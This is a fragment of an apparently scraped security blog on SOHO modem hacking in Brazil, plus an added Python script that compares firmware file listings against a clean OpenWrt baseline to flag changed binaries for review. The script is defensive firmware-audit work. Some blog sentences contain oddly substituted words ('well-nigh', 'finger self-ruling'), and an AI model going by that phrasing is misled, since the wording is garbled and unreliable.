Securing SOHO modems is very important, specially here in Brazil where lots of recent attacks were targeting these devices (<a href="https://twitter.com/assolini">Fabio Assolini's</a> talk "<a href="http://www.securelist.com/en/blog/208193852/The_tale_of_one_thousand_and_one_DSL_modems">The tale of one thousand and one DSL modems</a>" detailed this a year ago).</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><span style="text-align: start;">On the next post I'll detail how to run those MIPS32 binaries on a virtual environment using QEMU and unriddle some of the files with IDA Pro.</span></div>Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com8tag:blogger.com,1999:blog-3296471108082693838.post-90544217137691170542013-08-24T18:57:00.003-03:002013-08-25T02:38:30.955-03:00Hello worldI just started this new Blog to talk well-nigh some personal projects, exploits and hacking in general. I'm a Brazilian Infosec guy interested on embedded device hacking (modems, routers etc), webapp security, panel hacking and forensics. My twitter handle is <a href="https://twitter.com/bernardomr">@bernardomr</a>, finger self-ruling to ping me.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-8RzuHTN5JCI/UhktnBiiqWI/AAAAAAAAABE/t2nRUrM9n5Y/s1600/hworld.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="http://4.bp.blogspot.com/-8RzuHTN5JCI/UhktnBiiqWI/AAAAAAAAABE/t2nRUrM9n5Y/s200/hworld.png" width="196" /></a></div><br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com0
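The firmware post above builds its white-list by running `file` over the extracted root filesystem and comparing the result against a clean OpenWrt build, then reviewing what was created or modified. The script below is an added example of that comparison step; it is not code from the w00tsec post or from the SIMET project. It assumes two plain-text `file` listings in the "path: description" format shown in the post (one line per file). The baseline listing, the `/etc/rc.local` entries and the missing `cascade.css` entry are constructed for the demonstration; the other target lines are copied from the post's output. Only the `file` type string is compared, so two files reported as the same type still need a hash comparison before they are trusted.

```python
"""Diff a device's file(1) listing against a known-good baseline listing."""
from typing import Dict, List, Tuple

# Constructed baseline: what a clean OpenWrt image of the same release might
# report. Assumption for the demonstration only, not real SIMET/OpenWrt data.
BASELINE_LISTING = """\
/etc/rc.local: ASCII text
/usr/lib/libjson-c.so.2: symbolic link to `libjson-c.so.2.0.1'
/usr/lib/libjson-c.so.2.0.1: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size
/usr/lib/libpcap.so.1.1.1: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size
/usr/sbin/miniupnpd: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size
/usr/share/miniupnpd/firewall.include: POSIX shell script, ASCII text executable
/www/luci-static/bootstrap/cascade.css: assembler source, ASCII text
"""

# Device listing: entries copied from the post's file(1) output, plus a
# constructed /etc/rc.local that changed type (plain text -> shell script).
TARGET_LISTING = """\
/etc/rc.local: POSIX shell script, ASCII text executable
/usr/lib/libjson-c.so.2: symbolic link to `libjson-c.so.2.0.1'
/usr/lib/libjson-c.so.2.0.1: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size
/usr/lib/libpcap.so.1.1.1: ELF 32-bit MSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, corrupted section header size
/usr/sbin/autossh: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size
/usr/sbin/hping3: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size
/usr/sbin/miniupnpd: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size
/usr/sbin/zabbix_agentd: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1, dynamically linked (uses shared libs), corrupted section header size
/usr/share/miniupnpd/firewall.include: POSIX shell script, ASCII text executable
/www/simet/nonet.htm: UTF-8 Unicode text
/www/simet/view_tab.js: UTF-8 Unicode text, with very long lines
"""


def parse_listing(text: str) -> Dict[str, str]:
    """Parse file(1) output ("path: description" per line) into {path: description}.

    file(1) pads the description with spaces when given several paths, so the
    description is stripped. The path is everything before the first ": ";
    paths containing ": " would be mis-split, which is rare on an embedded rootfs.
    """
    entries: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        path, sep, desc = line.partition(": ")
        if not sep:
            raise ValueError(f"not a file(1) line: {raw!r}")
        entries[path] = desc.strip()
    return entries


def diff_listings(baseline: Dict[str, str], target: Dict[str, str]
                  ) -> Tuple[List[str], List[Tuple[str, str, str]], List[str]]:
    """Return (created, modified, removed) relative to the baseline.

    created  - paths present only on the device (new binaries, scripts, configs)
    modified - (path, baseline_desc, device_desc) where the reported type changed
    removed  - baseline paths missing from the device
    """
    created = sorted(p for p in target if p not in baseline)
    removed = sorted(p for p in baseline if p not in target)
    modified = sorted((p, baseline[p], target[p])
                      for p in target if p in baseline and baseline[p] != target[p])
    return created, modified, removed


def triage(paths: List[str], listing: Dict[str, str]) -> Dict[str, List[str]]:
    """Bucket paths by file(1) type so native binaries and scripts are reviewed
    before static web assets, following the post's per-file review approach."""
    buckets: Dict[str, List[str]] = {"binary": [], "script": [], "symlink": [], "other": []}
    for p in paths:
        desc = listing[p]
        if desc.startswith("ELF "):
            buckets["binary"].append(p)
        elif "script" in desc:
            buckets["script"].append(p)
        elif desc.startswith("symbolic link"):
            buckets["symlink"].append(p)
        else:
            buckets["other"].append(p)
    return buckets


def report(baseline_text: str, target_text: str) -> str:
    """Render a short review list for the analyst."""
    baseline, target = parse_listing(baseline_text), parse_listing(target_text)
    created, modified, removed = diff_listings(baseline, target)
    lines = [f"created ({len(created)}):"]
    for kind, paths in triage(created, target).items():
        lines += [f"  [{kind}] {p}" for p in paths]
    lines.append(f"modified ({len(modified)}):")
    lines += [f"  {p}: {old!r} -> {new!r}" for p, old, new in modified]
    lines.append(f"removed ({len(removed)}):")
    lines += [f"  {p}" for p in removed]
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(BASELINE_LISTING, TARGET_LISTING))
```

In a real review the baseline listing comes from a vanilla OpenWrt image of the same release and target, generated with the same `file` version, and the "modified" bucket is supplemented with a per-file hash comparison, since a replaced binary usually keeps the same `file` type string.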